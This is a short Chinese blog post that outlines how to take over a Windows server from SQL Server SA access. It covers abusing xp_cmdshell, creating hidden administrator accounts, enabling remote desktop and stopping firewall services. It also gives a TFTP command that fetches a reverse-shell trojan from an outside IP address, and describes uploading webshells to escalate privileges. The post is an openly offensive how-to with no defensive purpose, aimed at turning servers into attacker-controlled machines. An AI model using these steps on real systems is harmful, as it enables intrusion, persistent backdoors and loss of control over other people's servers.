讲解SA权限的渗透思路

一、直接执行命令提权得服务器
如果xp_cmdshell没有删除(如果被删,我们可以尝试恢复)

思路一

㈠ 执行命令探测相关信息

㈡ 根据相关信息提升权限
1.添加新用户并提升为管理员(用户名后加$,达到隐藏效果)
2.激活Guest,并提升为管理员

㈢ 查看终端服务(如果没开,我们可以尝试开33889)
1.先查看端口,如果开了3389,98%就是终端端口了
2.如果没开3389,用Net start查看开没有开终端服务(Terminal Service)。如果没开,尝试开启。

PS:提醒下的是还可开启Telnet服务,但已经是SA权限了,好像没什么不可能的了,开Telnet好像有点多此一举,但毕竟也是一种思路,就顺便说下。

㈣ 连接3389,得服务器权限。
如果连接失败,最大的可能就是防火墙了,用Net start命令查看服务,如发现有关防火墙的相关服务停掉相关服务。再连接。

PS:可考虑端口重定向绕过防火墙。

思路二

㈠ 执行命令探测相关信息

㈡ 利用TFTP下载反弹木马(如果TFTP.EXE被删,可尝试上传一个,或者写角本亦可下载)
TFTP命令是tftp -i IP get 反弹木马.exe C:\反弹木马.exe

㈢ 利用命令执行反弹木马

㈣ 成功获服务器肉鸡一台

二、先得Webshell,再通过Webshell提权

xp_cmdshell依赖的是sql的组件xplog70.dll这个动态连接库文件 如果xplog70.dll也被删,恢复XP_cmdshell已经无望,我们只有换种思路了。

PS:即使删除了xp_cmdshell和xplog70.dll,只要保留xp_regwrite就可以执行系统命令,拥有一个dos shell,利用RDS的一个老问题,在IIS 4.0的时候被广泛利用,照样可以得到一个SHell。

思路三

㈠ 通过列目录找到Web目录

㈡ 上传写入一句话木马

㈢ 写入小马 再写大马

㈣ 成功得到Webshell 用webshell上传文件

㈤ 权限提升

你可能感兴趣的:(网络安全)